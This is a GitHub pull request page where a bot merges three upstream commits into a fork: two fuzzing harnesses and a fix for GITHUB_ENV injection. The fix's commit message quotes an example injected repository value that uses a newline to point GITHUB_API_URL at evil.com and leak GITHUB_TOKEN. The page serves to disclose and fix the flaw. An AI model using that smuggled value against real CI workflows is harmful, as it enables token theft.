Skip to content

[pull] master from google:master#33

Merged
pull[bot] merged 3 commits intothreatcode:masterfrom
google:master
Apr 2, 2026
Merged

[pull] master from google:master#33
pull[bot] merged 3 commits intothreatcode:masterfrom
google:master

Conversation

@pull
Copy link
Copy Markdown

@pull pull Bot commented Apr 2, 2026
edited
Loading

See Commits and Changes for more details.

Created by pull[bot] (v2.0.0-alpha.4)

Can you help keep this open source service alive? 💖 Please sponsor : )

DavidKorczynski and others added 3 commits April 2, 2026 12:32
@DavidKorczynski
ghostscript: add icc harness (#15286)
c138f55 
Signed-off-by: David Korczynski <david@adalogics.com>
@DavidKorczynski
haproxy: add http harness (#15287)
eaf2e8b 
Signed-off-by: David Korczynski <david@adalogics.com>
@vitaliset
Fix GITHUB_ENV injection via crafted project.yaml main_repo (#15285)
ec12d23 
An attacker can inject arbitrary env vars into the PR helper workflow by
embedding newlines in `main_repo` (e.g.
`"https://repo\nGITHUB_API_URL=https://evil.com"`). This exfiltrates
`GITHUB_TOKEN` with `pull-requests: write` scope.

- `save_env()`: switch to delimiter-based format (`NAME<<UUID`)
structurally immune to injection
- `_sanitize_repo_url()`: strip control chars + validate scheme via
`urlparse`

New tests in `pr_helper_test.py` covering injection scenarios and URL
format regression.

b/483022611
@pull pull Bot locked and limited conversation to collaborators Apr 2, 2026
@pull pull Bot added the ⤵️ pull label Apr 2, 2026
@pull pull Bot merged commit ec12d23 into threatcode:master Apr 2, 2026
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.

Reviewers

No reviews

Assignees

No one assigned

Labels

⤵️ pull

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@DavidKorczynski @vitaliset